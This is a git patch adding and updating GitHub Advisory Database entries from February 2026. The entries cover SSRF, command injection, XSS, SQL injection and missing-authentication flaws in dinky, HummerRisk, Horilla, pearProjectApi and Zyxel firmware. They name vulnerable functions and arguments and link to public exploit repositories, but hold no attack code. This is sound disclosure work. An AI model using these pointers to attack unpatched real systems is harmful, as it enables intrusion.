diff --git a/advisories/unreviewed/2026/02/GHSA-v2vh-hr2h-f29r/GHSA-v2vh-hr2h-f29r.json b/advisories/unreviewed/2026/02/GHSA-v2vh-hr2h-f29r/GHSA-v2vh-hr2h-f29r.json
new file mode 100644
index 0000000000000..e841a8af248ca
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-v2vh-hr2h-f29r/GHSA-v2vh-hr2h-f29r.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-v2vh-hr2h-f29r",
+ "modified": "2026-02-24T03:30:20Z",
+ "published": "2026-02-24T03:30:20Z",
+ "aliases": [
+ "CVE-2026-3052"
+ ],
+ "details": "A vulnerability was found in DataLinkDC dinky up to 1.2.5. The impacted element is the function proxyUba of the file dinky-admin/src/main/java/org/dinky/controller/FlinkProxyController.java of the component Flink Proxy Controller. Performing a manipulation results in server-side request forgery. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3052"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/AnalogyC0de/public_exp/issues/7"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/AnalogyC0de/public_exp/issues/7#issue-3935032160"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347410"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347410"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757587"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-918"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T02:16:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-vq86-4hgw-x482/GHSA-vq86-4hgw-x482.json b/advisories/unreviewed/2026/02/GHSA-vq86-4hgw-x482/GHSA-vq86-4hgw-x482.json
new file mode 100644
index 0000000000000..d89487c5eed06
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-vq86-4hgw-x482/GHSA-vq86-4hgw-x482.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-vq86-4hgw-x482",
+ "modified": "2026-02-24T03:30:20Z",
+ "published": "2026-02-24T03:30:20Z",
+ "aliases": [
+ "CVE-2026-3065"
+ ],
+ "details": "A vulnerability was detected in HummerRisk up to 1.5.0. This affects the function CommandUtils.commonExecCmdWithResult of the file CloudTaskService.java of the component Cloud Task Dry-run. Performing a manipulation of the argument fileName results in command injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3065"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/AnalogyC0de/public_exp/issues/9"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347416"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347416"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757696"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T03:16:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-vv96-h3xf-q33j/GHSA-vv96-h3xf-q33j.json b/advisories/unreviewed/2026/02/GHSA-vv96-h3xf-q33j/GHSA-vv96-h3xf-q33j.json
new file mode 100644
index 0000000000000..dc1c447ee3389
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-vv96-h3xf-q33j/GHSA-vv96-h3xf-q33j.json 
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-vv96-h3xf-q33j",
+ "modified": "2026-02-24T03:30:19Z",
+ "published": "2026-02-24T03:30:19Z",
+ "aliases": [
+ "CVE-2026-3050"
+ ],
+ "details": "A flaw has been found in horilla-opensource horilla up to 1.0.2. Impacted is an unknown function of the file static/assets/js/global.js of the component Leads Module. This manipulation of the argument Notes causes cross site scripting. The attack is possible to be carried out remotely. The exploit has been published and may be used. Upgrading to version 1.0.3 is recommended to address this issue. Patch name: fc5c8e55988e89273012491b5f097b762b474546. It is suggested to upgrade the affected component.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3050"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Horilla-opensource/Horilla-crm/commit/fc5c8e55988e89273012491b5f097b762b474546"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Stolichnayer/Horilla-CRM-Stored-XSS"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/horilla-opensource/horilla-crm/releases/tag/1.0.3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347408"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347408"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757314"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T01:16:16Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-w3pf-j6xr-fj68/GHSA-w3pf-j6xr-fj68.json b/advisories/unreviewed/2026/02/GHSA-w3pf-j6xr-fj68/GHSA-w3pf-j6xr-fj68.json
new file mode 100644
index 0000000000000..e0acffbf3a307
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-w3pf-j6xr-fj68/GHSA-w3pf-j6xr-fj68.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w3pf-j6xr-fj68",
+ "modified": "2026-02-24T03:30:20Z",
+ "published": "2026-02-24T03:30:20Z",
+ "aliases": [
+ "CVE-2026-3053"
+ ],
+ "details": "A vulnerability was determined in DataLinkDC dinky up to 1.2.5. This affects the function addInterceptors of the file dinky-admin/src/main/java/org/dinky/configure/AppConfig.java of the component OpenAPI Endpoint. Executing a manipulation can lead to missing authentication. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3053"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/AnalogyC0de/public_exp/issues/6"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/AnalogyC0de/public_exp/issues/6#issue-3935019636"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347411"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347411"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757589"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-287"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T02:16:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-x6c4-87pg-m84f/GHSA-x6c4-87pg-m84f.json b/advisories/unreviewed/2026/02/GHSA-x6c4-87pg-m84f/GHSA-x6c4-87pg-m84f.json
new file mode 100644
index 0000000000000..5cf82da0511d9
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-x6c4-87pg-m84f/GHSA-x6c4-87pg-m84f.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x6c4-87pg-m84f",
+ "modified": "2026-02-24T03:30:20Z",
+ "published": "2026-02-24T03:30:20Z",
+ "aliases": [
+ "CVE-2026-1459"
+ ],
+ "details": "A post-authentication command injection vulnerability in the TR-369 certificate download CGI program of the Zyxel VMG3625-T50B firmware versions through 5.50(ABPM.9.7)C0 could allow an authenticated attacker with administrator privileges to execute operating system (OS) commands on an affected device.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1459"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-null-pointer-dereference-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-02-24-2026"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T03:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-xqg5-5x64-93r9/GHSA-xqg5-5x64-93r9.json b/advisories/unreviewed/2026/02/GHSA-xqg5-5x64-93r9/GHSA-xqg5-5x64-93r9.json
new file mode 100644
index 0000000000000..819c1eaacc4a7
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-xqg5-5x64-93r9/GHSA-xqg5-5x64-93r9.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xqg5-5x64-93r9",
+ "modified": "2026-02-24T03:30:20Z",
+ "published": "2026-02-24T03:30:20Z",
+ "aliases": [
+ "CVE-2026-3057"
+ ],
+ "details": "A security flaw has been discovered in a54552239 pearProjectApi up to 2.8.10. Affected is the function dateTotalForProject of the file application/common/Model/Task.php of the component Backend Interface. The manipulation of the argument projectCode results in sql injection. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3057"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/XiaoyuZhou1997/CVE/issues/1"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/XiaoyuZhou1997/CVE/issues/1#issue-3935708166"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347413"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347413"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757669"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T03:16:03Z"
+ }
+}
\ No newline at end of file
From 98d385712accc53e02160f5088f640e85318b307 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 24 Feb 2026 06:32:45 +0000 Subject: [PATCH 74/77] Publish Advisories GHSA-325g-f49v-c2hf GHSA-33jh-2f37-89xc GHSA-3h23-rfwm-gcx3 GHSA-4268-mm99-gpjc GHSA-52cp-m58w-wp9x GHSA-5c5w-4x77-3vjh GHSA-9wrx-vcj7-gm99 GHSA-g8f3-f559-737f GHSA-gm3m-q82f-958h GHSA-hhp2-jq65-cjxx GHSA-m5wr-8mwj-cqpw GHSA-r22q-wf27-426v GHSA-rw74-fqrf-pr2q GHSA-vjgx-vcpf-hm6w GHSA-3grc-c2rj-3qj5 GHSA-83rq-88jr-634x GHSA-cxmx-5wwh-7p77 GHSA-fwq6-2c4r-9g8h GHSA-mcwp-v5q8-7gcp GHSA-p86v-p9g7-fffw GHSA-rx2f-c6vf-gmg2 GHSA-wgpr-jxrq-2m57 --- .../GHSA-325g-f49v-c2hf.json | 6 +- .../GHSA-33jh-2f37-89xc.json | 6 +- .../GHSA-3h23-rfwm-gcx3.json | 6 +- .../GHSA-4268-mm99-gpjc.json | 6 +- .../GHSA-52cp-m58w-wp9x.json | 6 +- .../GHSA-5c5w-4x77-3vjh.json | 6 +- .../GHSA-9wrx-vcj7-gm99.json | 6 +- .../GHSA-g8f3-f559-737f.json | 6 +- .../GHSA-gm3m-q82f-958h.json | 6 +- .../GHSA-hhp2-jq65-cjxx.json | 6 +- .../GHSA-m5wr-8mwj-cqpw.json | 6 +- .../GHSA-r22q-wf27-426v.json | 6 +- .../GHSA-rw74-fqrf-pr2q.json | 6 +- .../GHSA-vjgx-vcpf-hm6w.json | 6 +- .../GHSA-3grc-c2rj-3qj5.json | 40 +++++++++++++ .../GHSA-83rq-88jr-634x.json | 56 +++++++++++++++++++ .../GHSA-cxmx-5wwh-7p77.json | 56 +++++++++++++++++++ .../GHSA-fwq6-2c4r-9g8h.json | 56 +++++++++++++++++++ .../GHSA-mcwp-v5q8-7gcp.json | 29 ++++++++++ .../GHSA-p86v-p9g7-fffw.json | 52 +++++++++++++++++ .../GHSA-rx2f-c6vf-gmg2.json | 52 +++++++++++++++++ .../GHSA-wgpr-jxrq-2m57.json | 56 +++++++++++++++++++ 22 files changed, 467 insertions(+), 14 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-3grc-c2rj-3qj5/GHSA-3grc-c2rj-3qj5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-83rq-88jr-634x/GHSA-83rq-88jr-634x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cxmx-5wwh-7p77/GHSA-cxmx-5wwh-7p77.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fwq6-2c4r-9g8h/GHSA-fwq6-2c4r-9g8h.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-mcwp-v5q8-7gcp/GHSA-mcwp-v5q8-7gcp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p86v-p9g7-fffw/GHSA-p86v-p9g7-fffw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rx2f-c6vf-gmg2/GHSA-rx2f-c6vf-gmg2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wgpr-jxrq-2m57/GHSA-wgpr-jxrq-2m57.json diff --git a/advisories/unreviewed/2025/12/GHSA-325g-f49v-c2hf/GHSA-325g-f49v-c2hf.json b/advisories/unreviewed/2025/12/GHSA-325g-f49v-c2hf/GHSA-325g-f49v-c2hf.json index b0a3d5468777b..df7b952f5c4b4 100644 --- a/advisories/unreviewed/2025/12/GHSA-325g-f49v-c2hf/GHSA-325g-f49v-c2hf.json +++ b/advisories/unreviewed/2025/12/GHSA-325g-f49v-c2hf/GHSA-325g-f49v-c2hf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-325g-f49v-c2hf", - "modified": "2025-12-12T18:30:35Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-12T18:30:35Z", "aliases": [ "CVE-2025-14565" @@ -38,6 +38,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.703875" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.725464" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/12/GHSA-33jh-2f37-89xc/GHSA-33jh-2f37-89xc.json b/advisories/unreviewed/2025/12/GHSA-33jh-2f37-89xc/GHSA-33jh-2f37-89xc.json index 33c88d503ddbb..9f06b5aab7d76 100644 --- a/advisories/unreviewed/2025/12/GHSA-33jh-2f37-89xc/GHSA-33jh-2f37-89xc.json +++ b/advisories/unreviewed/2025/12/GHSA-33jh-2f37-89xc/GHSA-33jh-2f37-89xc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-33jh-2f37-89xc", - "modified": "2025-12-13T00:30:26Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-13T00:30:26Z", "aliases": [ "CVE-2025-14582" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://vuldb.com/?submit.705524" }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.714164" + }, { "type": "WEB", "url": "https://www.campcodes.com" 
diff --git a/advisories/unreviewed/2025/12/GHSA-3h23-rfwm-gcx3/GHSA-3h23-rfwm-gcx3.json b/advisories/unreviewed/2025/12/GHSA-3h23-rfwm-gcx3/GHSA-3h23-rfwm-gcx3.json index b8de4788c8c04..1ee063fddf061 100644 --- a/advisories/unreviewed/2025/12/GHSA-3h23-rfwm-gcx3/GHSA-3h23-rfwm-gcx3.json +++ b/advisories/unreviewed/2025/12/GHSA-3h23-rfwm-gcx3/GHSA-3h23-rfwm-gcx3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3h23-rfwm-gcx3", - "modified": "2025-12-19T18:31:18Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-19T18:31:18Z", "aliases": [ "CVE-2025-14957" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/WebAssembly/binaryen/commit/6fb2b917a79578ab44cf3b900a6da4c27251e0d4" }, + { + "type": "WEB", + "url": "https://github.com/WebAssembly/binaryen" + }, { "type": "WEB", "url": "https://github.com/oneafter/1204/blob/main/af1" diff --git a/advisories/unreviewed/2025/12/GHSA-4268-mm99-gpjc/GHSA-4268-mm99-gpjc.json b/advisories/unreviewed/2025/12/GHSA-4268-mm99-gpjc/GHSA-4268-mm99-gpjc.json index 8c20c3af1e7be..439c43e4b64b8 100644 --- a/advisories/unreviewed/2025/12/GHSA-4268-mm99-gpjc/GHSA-4268-mm99-gpjc.json +++ b/advisories/unreviewed/2025/12/GHSA-4268-mm99-gpjc/GHSA-4268-mm99-gpjc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4268-mm99-gpjc", - "modified": "2025-12-08T03:31:04Z", + "modified": "2026-02-24T06:31:29Z", "published": "2025-12-08T03:31:04Z", "aliases": [ "CVE-2025-14211" @@ -38,6 +38,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.700949" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.707937" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/12/GHSA-52cp-m58w-wp9x/GHSA-52cp-m58w-wp9x.json b/advisories/unreviewed/2025/12/GHSA-52cp-m58w-wp9x/GHSA-52cp-m58w-wp9x.json index 6f49994b33b31..cc4c95325bf0e 100644 --- a/advisories/unreviewed/2025/12/GHSA-52cp-m58w-wp9x/GHSA-52cp-m58w-wp9x.json 
+++ b/advisories/unreviewed/2025/12/GHSA-52cp-m58w-wp9x/GHSA-52cp-m58w-wp9x.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-52cp-m58w-wp9x", - "modified": "2025-12-14T18:31:30Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-14T18:31:30Z", "aliases": [ "CVE-2025-14672" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14672" }, + { + "type": "WEB", + "url": "https://gitee.com/gmg137/snap7-rs" + }, { "type": "WEB", "url": "https://gitee.com/gmg137/snap7-rs/issues/ID2H8E" diff --git a/advisories/unreviewed/2025/12/GHSA-5c5w-4x77-3vjh/GHSA-5c5w-4x77-3vjh.json b/advisories/unreviewed/2025/12/GHSA-5c5w-4x77-3vjh/GHSA-5c5w-4x77-3vjh.json index 2265e40c9e0aa..f3ef081be61e2 100644 --- a/advisories/unreviewed/2025/12/GHSA-5c5w-4x77-3vjh/GHSA-5c5w-4x77-3vjh.json +++ b/advisories/unreviewed/2025/12/GHSA-5c5w-4x77-3vjh/GHSA-5c5w-4x77-3vjh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5c5w-4x77-3vjh", - "modified": "2025-12-19T21:30:19Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-19T21:30:19Z", "aliases": [ "CVE-2025-14962" @@ -42,6 +42,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.717640" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.724795" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/12/GHSA-9wrx-vcj7-gm99/GHSA-9wrx-vcj7-gm99.json b/advisories/unreviewed/2025/12/GHSA-9wrx-vcj7-gm99/GHSA-9wrx-vcj7-gm99.json index e9f78be94b25a..780d9232d71e2 100644 --- a/advisories/unreviewed/2025/12/GHSA-9wrx-vcj7-gm99/GHSA-9wrx-vcj7-gm99.json +++ b/advisories/unreviewed/2025/12/GHSA-9wrx-vcj7-gm99/GHSA-9wrx-vcj7-gm99.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9wrx-vcj7-gm99", - "modified": "2025-12-19T18:31:18Z", + "modified": "2026-02-24T06:31:30Z", "published": "2025-12-19T18:31:18Z", "aliases": [ "CVE-2025-14955" 
@@ -39,6 +39,10 @@
 "type": "WEB",
 "url": "https://github.com/open5gs/open5gs/commit/773117aa5472af26fc9f80e608d3386504c3bdb7"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/open5gs/open5gs"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.337591"
diff --git a/advisories/unreviewed/2025/12/GHSA-g8f3-f559-737f/GHSA-g8f3-f559-737f.json b/advisories/unreviewed/2025/12/GHSA-g8f3-f559-737f/GHSA-g8f3-f559-737f.json
index 0e188c8a0c186..66e37bd5b4b77 100644
--- a/advisories/unreviewed/2025/12/GHSA-g8f3-f559-737f/GHSA-g8f3-f559-737f.json
+++ b/advisories/unreviewed/2025/12/GHSA-g8f3-f559-737f/GHSA-g8f3-f559-737f.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-g8f3-f559-737f",
- "modified": "2025-12-19T18:31:18Z",
+ "modified": "2026-02-24T06:31:30Z",
 "published": "2025-12-19T18:31:17Z",
 "aliases": [
 "CVE-2025-14953"
@@ -39,6 +39,10 @@
 "type": "WEB",
 "url": "https://github.com/open5gs/open5gs/commit/93a9fd98a8baa94289be3b982028201de4534e32"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/open5gs/open5gs"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.337589"
diff --git a/advisories/unreviewed/2025/12/GHSA-gm3m-q82f-958h/GHSA-gm3m-q82f-958h.json b/advisories/unreviewed/2025/12/GHSA-gm3m-q82f-958h/GHSA-gm3m-q82f-958h.json
index 53abdaa22149a..2532ad07a3e86 100644
--- a/advisories/unreviewed/2025/12/GHSA-gm3m-q82f-958h/GHSA-gm3m-q82f-958h.json
+++ b/advisories/unreviewed/2025/12/GHSA-gm3m-q82f-958h/GHSA-gm3m-q82f-958h.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-gm3m-q82f-958h",
- "modified": "2025-12-19T18:31:18Z",
+ "modified": "2026-02-24T06:31:30Z",
 "published": "2025-12-19T18:31:17Z",
 "aliases": [
 "CVE-2025-14954"
@@ -39,6 +39,10 @@
 "type": "WEB",
 "url": "https://github.com/open5gs/open5gs/commit/442369dcd964f03d95429a6a01a57ed21f7779b7"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/open5gs/open5gs"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.337590"
diff --git a/advisories/unreviewed/2025/12/GHSA-hhp2-jq65-cjxx/GHSA-hhp2-jq65-cjxx.json b/advisories/unreviewed/2025/12/GHSA-hhp2-jq65-cjxx/GHSA-hhp2-jq65-cjxx.json
index eeb5c71fe0404..a53a6ae58c1eb 100644
--- a/advisories/unreviewed/2025/12/GHSA-hhp2-jq65-cjxx/GHSA-hhp2-jq65-cjxx.json
+++ b/advisories/unreviewed/2025/12/GHSA-hhp2-jq65-cjxx/GHSA-hhp2-jq65-cjxx.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-hhp2-jq65-cjxx",
- "modified": "2025-12-09T00:31:16Z",
+ "modified": "2026-02-24T06:31:30Z",
 "published": "2025-12-09T00:31:16Z",
 "aliases": [
 "CVE-2025-14276"
@@ -35,6 +35,10 @@
 "type": "WEB",
 "url": "https://vuldb.com/?submit.702649"
 },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.715521"
+ },
 {
 "type": "WEB",
 "url": "https://www.yuque.com/yuqueyonghuexlgkz/zepczx/ahygt5u6sgqpk5tt?singleDoc"
diff --git a/advisories/unreviewed/2025/12/GHSA-m5wr-8mwj-cqpw/GHSA-m5wr-8mwj-cqpw.json b/advisories/unreviewed/2025/12/GHSA-m5wr-8mwj-cqpw/GHSA-m5wr-8mwj-cqpw.json
index 27f42fd1dd6bb..4ca6851d1ac0f 100644
--- a/advisories/unreviewed/2025/12/GHSA-m5wr-8mwj-cqpw/GHSA-m5wr-8mwj-cqpw.json
+++ b/advisories/unreviewed/2025/12/GHSA-m5wr-8mwj-cqpw/GHSA-m5wr-8mwj-cqpw.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-m5wr-8mwj-cqpw",
- "modified": "2025-12-18T03:30:17Z",
+ "modified": "2026-02-24T06:31:30Z",
 "published": "2025-12-18T03:30:17Z",
 "aliases": [
 "CVE-2025-14856"
@@ -38,6 +38,10 @@
 {
 "type": "WEB",
 "url": "https://vuldb.com/?submit.710152"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.736164"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2025/12/GHSA-r22q-wf27-426v/GHSA-r22q-wf27-426v.json b/advisories/unreviewed/2025/12/GHSA-r22q-wf27-426v/GHSA-r22q-wf27-426v.json
index 35a1bfed07dd6..7d5d583ce346c 100644
--- a/advisories/unreviewed/2025/12/GHSA-r22q-wf27-426v/GHSA-r22q-wf27-426v.json
+++ b/advisories/unreviewed/2025/12/GHSA-r22q-wf27-426v/GHSA-r22q-wf27-426v.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-r22q-wf27-426v",
- "modified": "2025-12-14T15:30:19Z",
+ "modified": "2026-02-24T06:31:30Z",
 "published": "2025-12-14T15:30:18Z",
 "aliases": [
 "CVE-2025-14665"
@@ -43,6 +43,10 @@
 "type": "WEB",
 "url": "https://vuldb.com/?submit.714400"
 },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.719220"
+ },
 {
 "type": "WEB",
 "url": "https://www.tenda.com.cn"
